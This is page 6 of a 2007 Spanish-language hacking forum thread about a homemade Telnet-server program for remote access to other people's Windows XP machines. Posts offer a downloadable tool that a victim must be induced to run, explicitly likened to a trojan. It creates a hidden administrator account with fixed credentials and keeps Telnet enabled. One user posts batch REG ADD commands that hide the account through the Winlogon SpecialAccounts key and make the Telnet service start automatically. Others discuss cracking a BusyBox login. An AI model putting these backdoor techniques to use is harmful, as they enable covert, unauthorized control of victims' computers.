hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
26 de Julio de 2008, 01:48:08
Noticias: ¿Buscas código fuente para Visual Basic? Haz clic
Para ver este enlace Registrate o Inicia Sesion
aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, HolyKnight, kamui23, CHR0N05, - TuX -)
| | |-+  MANUAL PARA CREAR UN SERVIDOR TELNET Y HACER LA CONEXION REMOTA + PROGRAMA ¡¡
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 Ir Abajo Imprimir
Autor Tema: MANUAL PARA CREAR UN SERVIDOR TELNET Y HACER LA CONEXION REMOTA + PROGRAMA ¡¡  (Leído 56522 veces)
01brian
NZ1
*
Desconectado Desconectado

THE ANGEL OF THE VIRUS

Ver Perfil
« Respuesta #75 : 23 de Marzo de 2007, 07:18:52 »

hola a todos bueno mi pregunta es la siguiente y disculpen la tonteria q boy a preguntar .??

en si para q me sirve el servicio telnet q beneficios me trae..Huh

pls ayudenme

"MI DESEO ES APRENDER MAS Y MAS"  umm

SU AMIGO THE ANGEL Smiley

THE ANGEL OF THE VIRUS

visitanos y registrate: http://asociacionbucaneros.mundoforo.com/index.php
ismael_34
Recien llegado
*

Ver Perfil
« Respuesta #76 : 28 de Marzo de 2007, 12:31:35 »

hola amigos

estoy probando el segundo server q a hecho microchip.el oculto ,pero cuando coloco la contraseña ,me dice q nanai de la china,osea un mojon pa mi

ya lo e probado con letras mayusculas y con las chiquititas minusculas creo q le llaman,jejejejje

pero q va no me deja el jodio telnet conectarme

la pregunta es si son estas las letritas q e de poner

login: Microchip
                                   pass: micro

bueno un saludo a todos y aprovecho para felicitar al genio microchip   Grin

------- Denuncia la pedoflia ---------

http://www.protegeles.com/
ismael_34
Recien llegado
*

Ver Perfil
« Respuesta #77 : 28 de Marzo de 2007, 04:11:10 »

Bueno de pensarlo un poco lo mejore este programita  le añadi algunos trucos de Visual Basic je je!!!!
Ventajas:
No se ve el usuario añadido, osea luego de ejecutar el programa reiniciara y creara una cuenta de administrador la cual sera invisible je je!!!!
No se ve en el registro de windows lo que hicimos, osea no se guardara en la ruta que todos conocemos de RUN para que se inicie cada vez que carga el windows
Pero usuario puerto y servicio estaran activos todo el tiempo

Bueno los que hagan la prueba:
Usuario: Microchip
pass: micro

Aunque no se utilize el puerto de telnet puede utilizarse otro tipo de conexion teniendo esta cuenta de administrador

aqui esta el enlace para su descarga, para los que no conocen es similar a la conexion por troyanos, hay que hacer que la victima ejecute el programa y esperar a que reinicie para poder conectarnos a dicha maquina.... eso ya esta explicado al comienzo del tuto

http://z28.zupload.com/download.php?file=getfile&filepath=45276

hola microchip

mira, estoy intentando de conectarme con este servidor q baje de ese link ,pero no logro conectarme  ,el nombre de usuario o el pass deben de estar mal, o yo no los e sabido colocar, el q e usado es este login: Microchip y el pass :micro

en cambio e usado el codigo q as colocado en un post de los primeros,  no le hice ningun cambio al codigo,por lo tanto el login es nombre y  el pass:  pass ,asi si e logrado conectarme

haber si me puedes indicar si es correcto el  login y el pass q puse,gracias

chauuu amigo  Grin

mycrox
Colaborador

En la alabanza todo mi ser se eleva hasta el cielo

Ver Perfil
« Respuesta #78 : 28 de Marzo de 2007, 05:55:30 »

oe microchip... aver que me dices de esto...

el otro dia instalé el windows XP en un pc de un amigo... le saco la IP y luego en mi casa le hago un scan...

me sale con el chiste de que tiene el servicio telnet habilitado en el puerto 23 (que es el puerto default)

al hacerle telnet me sale lo siguiente:

BusyBox on (none) login:

y empieza a esperar...

averigue por google pero de lo poco y nada que encontré, me di cuenta de que BusyBox es un programa... que hace? no tengo idea... pero si sabes porfavor, pegate una ayudadita.. como siempre

vale!

Deseas aprender a programar de verdad??
Haz click
Aqui

Microchip
Visitante
« Respuesta #79 : 29 de Marzo de 2007, 04:32:31 »

hola microchip

mira, estoy intentando de conectarme con este servidor q baje de ese link ,pero no logro conectarme  ,el nombre de usuario o el pass deben de estar mal, o yo no los e sabido colocar, el q e usado es este login: Microchip y el pass :micro

en cambio e usado el codigo q as colocado en un post de los primeros,  no le hice ningun cambio al codigo,por lo tanto el login es nombre y  el pass:  pass ,asi si e logrado conectarme

haber si me puedes indicar si es correcto el  login y el pass q puse,gracias

chauuu amigo  Grin

Holas amigo Cheesy, pues no se que sucede ya que el user: Microchip  pass:micro
es el que puse y el que funciona lo hice la prueba en este momento :S, la conexion que quieres realizar es a un pc remoto?? o a tu misma pc?

Avisame Cheesy

Saludos Cheesy

oe microchip... aver que me dices de esto...

el otro dia instalé el windows XP en un pc de un amigo... le saco la IP y luego en mi casa le hago un scan...

me sale con el chiste de que tiene el servicio telnet habilitado en el puerto 23 (que es el puerto default)

al hacerle telnet me sale lo siguiente:

BusyBox on (none) login:

y empieza a esperar...

averigue por google pero de lo poco y nada que encontré, me di cuenta de que BusyBox es un programa... que hace? no tengo idea... pero si sabes porfavor, pegate una ayudadita.. como siempre

vale!

Ese programa es similar al servidor telnet de microsoft, la diferencia es que tiene las opciones comunes de UNIX compactadas en su programa, ahora supongo que el user de esa PC debe tener montado un pequeño server, del cual se puede averiguar un user y pass por medio de un crackeador, pero esto demora mucho dependiendo del user configurado, otra opcion es que sepas algun user admn y su pass de esa pc para conectarte, la cosa es que hasta donde se ese programa es para LINUX talvez haya una version para windows, ya que tu instalaste el xp en su pc, podria ser que tb haya instalado luego alguna distro de Linux o algun porg como "Vmware" no recuerdo bien el nombre, pero puede emular otro sistema operativo en la misma pc.
Bueno supongo que debes tener algo de info de su pc como el nombre de admn y algo mas, asi que puedes probar con ese login para ver si te resulta Cheesy

Saludos!

EL server esta running ... pero cuando me pide el loggin y la pas es cuando me da el problema pero esta bien eso lo escribo correctamenete pero no se que pasa

Se desconecta directamente y no te da opcion de ingresar, fijate en los servicios administrativo s - telnet , si hay algun user configurado en "iniciar sesion" o esta con cuenta local Cheesy
ismael_34
Recien llegado
*

Ver Perfil
« Respuesta #80 : 29 de Marzo de 2007, 06:06:22 »

hola microchip

mira, las pruebas de conexion las e realizado en mi pc ,pero las e realizado de formas distintas

1º telnet 127.0.0.1
                       2º telnet 80.102.35.6

de las dos formas llego a la seccion de login,pero cuando introdusco la contraseña MIcrochip:micro

en la siguiente linea me dice ,el jodio,Error de inicio de seccion nombre de usuario desconocido o contraseña incorecta,yo como soy muy terco le incisto,jejejeje y coloco la contraseña en minusculas en mayusculas con un espacio al final o uno al principio,vamos q lo e probado todo amigo ,pero no puedo

asi q viendo, q en mi caso, es imposible,jodia esta parabra eh, imposible ,
e decidido tomar otro camino y usar el codigo abierto ,el cual si me funciona a la hora de logearme,lo q me ocurre es q ,como ya tu sabes ,al iniciar xp te sale el nombre de la nueva cuenta creada,q en el codigo original es nombre y el pass :pass ,asi q e intentado q cuando se inicie el xp no sevea la cuenta nombre,lo e hecho asi

@echo off
REG ADD HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts /v nombre /t REG_DWORD /d 2 /f
exit

es gracioso ahora me sale otro problemilla,y en el registro de xp no llega a crearce la clave nombre

e echo otras pruebas hice esto

@echo off
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
exit

y en este caso si se crea la clave en el registro

sabrias decirme por q no me deja el registro crear la clave,ya e tocado permisos ,pero tampoco,jejejej,seve q la cosa del hackin me esta dando una buena,pero yo sigo incistiendo eh,jejejeje

bueno amigo ,gracias

mycrox
Colaborador

En la alabanza todo mi ser se eleva hasta el cielo

Ver Perfil
« Respuesta #81 : 29 de Marzo de 2007, 10:08:29 »

ok... microchip...

pero si me se el user, el pass y entro..

los comandos tendrán que ser UNIX??

o podran ser MS-DOS???

mira.... yo voy a probar y tratar de entrar... si es que no me sabes responder... yo trataré de postearlo aquí ya que veo que esta info. no está aqui en el portal..

saludos!

Deseas aprender a programar de verdad??
Haz click
Aqui

Microchip
Visitante
« Respuesta #82 : 29 de Marzo de 2007, 08:48:43 »

ok... microchip...

pero si me se el user, el pass y entro..

los comandos tendrán que ser UNIX??

o podran ser MS-DOS???

mira.... yo voy a probar y tratar de entrar... si es que no me sabes responder... yo trataré de postearlo aquí ya que veo que esta info. no está aqui en el portal..

saludos!

Los comandos serian de UNIX no de MS DOS Cheesy

Cuentas que tal te fue Cheesy

hola microchip

mira, las pruebas de conexion las e realizado en mi pc ,pero las e realizado de formas distintas

1º telnet 127.0.0.1
                       2º telnet 80.102.35.6

de las dos formas llego a la seccion de login,pero cuando introdusco la contraseña MIcrochip:micro

en la siguiente linea me dice ,el jodio,Error de inicio de seccion nombre de usuario desconocido o contraseña incorecta,yo como soy muy terco le incisto,jejejeje y coloco la contraseña en minusculas en mayusculas con un espacio al final o uno al principio,vamos q lo e probado todo amigo ,pero no puedo

asi q viendo, q en mi caso, es imposible,jodia esta parabra eh, imposible ,
e decidido tomar otro camino y usar el codigo abierto ,el cual si me funciona a la hora de logearme,lo q me ocurre es q ,como ya tu sabes ,al iniciar xp te sale el nombre de la nueva cuenta creada,q en el codigo original es nombre y el pass :pass ,asi q e intentado q cuando se inicie el xp no sevea la cuenta nombre,lo e hecho asi

@echo off
REG ADD HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts /v nombre /t REG_DWORD /d 2 /f
exit

es gracioso ahora me sale otro problemilla,y en el registro de xp no llega a crearce la clave nombre

e echo otras pruebas hice esto

@echo off
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
exit

y en este caso si se crea la clave en el registro

sabrias decirme por q no me deja el registro crear la clave,ya e tocado permisos ,pero tampoco,jejejej,seve q la cosa del hackin me esta dando una buena,pero yo sigo incistiendo eh,jejejeje

bueno amigo ,gracias

Mira tu MP

Saludos!
hari
NZ1
*

Ver Perfil WWW
« Respuesta #83 : 01 de Abril de 2007, 12:07:32 »

ami no me sale telnet para habilitar

mas vale saber y no necesitar
que neceistar y no saber
lithinjur
NZ1
*

Ver Perfil
« Respuesta #84 : 02 de Abril de 2007, 05:34:18 »

vale lo e leido pero no me he enterado bien de para que sirve me lo podeis explicar??? Undecided
lithinjur
NZ1
*

Ver Perfil
« Respuesta #85 : 02 de Abril de 2007, 05:38:33 »

me podriais decir para que sirve esto???
lucifer92
Recien llegado
*

Ver Perfil
« Respuesta #86 : 02 de Abril de 2007, 05:44:38 »

HI, SALUDOS A TODOS
aunque no he leido el post entero por lo que he leido me parece que esta todo jenial explicado y especificado lo que es cada cosa pero tengo un problema, tengo el windows XP y en el panel de control la unica opcion que aparece de herrmientas (barra superior) solo me aparecen estas opciones:
-conectar a unidad de red
-desconectar´´``
-sincronizar...
y -opciones de carpeta
pero no me aparece "administrativa s"

POR FAVOR SI ALGUIEN PUEDE AYUDARME QUE NO DUDE EN CONTESTAR
bustaminta
Recien llegado
*

Ver Perfil
« Respuesta #87 : 08 de Abril de 2007, 08:44:45 »

Manual exelente ahora la unica pregunta es como voy para atras
osea como logro eliminar el usuario microsoft y que no vuelva despues del reinicio?

thanks
v-tec-33
Recien llegado
*

Ver Perfil
« Respuesta #88 : 08 de Abril de 2007, 11:11:44 »

MmM Es un poquito complicado pero es muy bueno ¨¨ .

Salu2
dj-ghost
Recien llegado
*

Ver Perfil
« Respuesta #89 : 08 de Abril de 2007, 11:46:45 »

http://   a mi no me furula eso
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión